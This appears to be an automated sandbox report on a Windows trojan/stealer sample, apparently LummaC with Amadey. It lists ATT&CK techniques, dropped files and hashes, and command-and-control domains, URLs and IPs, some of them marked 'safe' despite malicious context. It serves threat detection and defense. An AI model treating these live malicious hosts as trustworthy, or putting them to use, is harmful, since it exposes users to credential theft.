DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	461 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CLaYpUL3zw.exe	52%	Virustotal		Browse
CLaYpUL3zw.exe	50%	ReversingLabs
CLaYpUL3zw.exe	100%	Avira	HEUR/AGEN.1313526
CLaYpUL3zw.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\768400\Climb.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\PasoCattle.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Set-up.exe	70%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
https://spuriotis.click/xD	0%	Avira URL Cloud	safe
https://spuriotis.click/uo	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=I	100%	Avira URL Cloud	malware
https://spuriotis.click/	0%	Avira URL Cloud	safe
https://spuriotis.click/apiK	0%	Avira URL Cloud	safe
https://spuriotis.click:443/api	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06	100%	Avira URL Cloud	malware
https://spuriotis.click:443/apil	0%	Avira URL Cloud	safe
https://spuriotis.click/api	0%	Avira URL Cloud	safe
https://spuriotis.click/piVL	0%	Avira URL Cloud	safe
spuriotis.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
spuriotis.click	172.67.128.184	true	true	unknown
home.fortth14ht.top	194.87.58.92	true	false	high
httpbin.org	34.226.108.155	true	false	high
yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://spuriotis.click/api	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
prisonyfork.buzz	false		high
spuriotis.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=I	Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://html4/loose.dtd	CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000003.00000002.2499326538.0000000001129000.00000004.00000001.01000000.00000008.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click/apiK	Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.css	CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://spuriotis.click/xD	Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
https://spuriotis.click/piVL	Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://x1.c.lencr.org/0	Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click/uo	Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://spuriotis.click/	Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296354162.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Climb.com, 0000000E.00000000.2308290688.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2217096288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
https://www.ecosia.org/newtab/	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spuriotis.click:443/api	Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://spuriotis.click:443/apil	Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://httpbin.org/ipbefore	CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06	Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.128.184	spuriotis.click	United States	13335	CLOUDFLARENETUS	true
34.226.108.155	httpbin.org	United States	14618	AMAZON-AESUS	false
194.87.58.92	home.fortth14ht.top	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581578
Start date and time:	2024-12-28 09:28:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CLaYpUL3zw.exe renamed because original name is a hash value
Original Sample Name:	ccf904b9afa2515f1120932e4bd1f148.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/23@10/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.190.181.3, 40.126.53.6, 20.190.181.5, 40.126.53.7, 40.126.53.16, 40.126.53.15, 20.231.128.66, 40.126.53.17, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target CLaYpUL3zw.exe, PID 6620 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 4352 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:29:26	API Interceptor	1x Sleep call for process: PasoCattle.exe modified
03:29:36	API Interceptor	9x Sleep call for process: Climb.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
34.226.108.155	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
spuriotis.click	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	104.21.2.51
httpbin.org	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
home.fortth14ht.top	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RELCOM-ASRelcomGroup19022019RU	arm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	mips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	ppc.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	harm4.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	harm5.elf	Get hash	malicious	Unknown	Browse	194.58.66.131
	hmips.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	arm7.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
	x86.elf	Get hash	malicious	Unknown	Browse	194.58.66.244
	ppc.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
CLOUDFLARENETUS	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	ronwod.exe	Get hash	malicious	LummaC	Browse	104.21.92.219
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.198.222
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.166.49
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.132.7
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Script.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
AMAZON-AESUS	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	54.225.146.64
	d8tp5flwzP.exe	Get hash	malicious	Metasploit	Browse	18.209.65.151
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E205fJJS1Q.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	3.218.7.103
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	hx0wBsOjkQ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	fnnGMmd8eJ.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	PW6pjyv02h.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	lumma.ps1	Get hash	malicious	LummaC	Browse	172.67.128.184
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	ronwod.exe	Get hash	malicious	LummaC	Browse	172.67.128.184
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.128.184
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.128.184

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\768400\Climb.com	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLaYpUL3zw.exe.log

Download File

Process:	C:\Users\user\Desktop\CLaYpUL3zw.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\768400\Climb.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: BagsThroat.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse Filename: SoftWare(1).exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: JA7cOAGHym.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse Filename: installer.bat, Detection: malicious, Browse Filename: skript.bat, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\768400\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	459790
Entropy (8bit):	7.999632331590964
Encrypted:	true
SSDEEP:	12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
MD5:	F9D71E9E58748BEEA3554073DCD205C8
SHA1:	0F059E563F46355BCA0866B3D7D0993DA4991C18
SHA-256:	45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
SHA-512:	BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
Malicious:	false
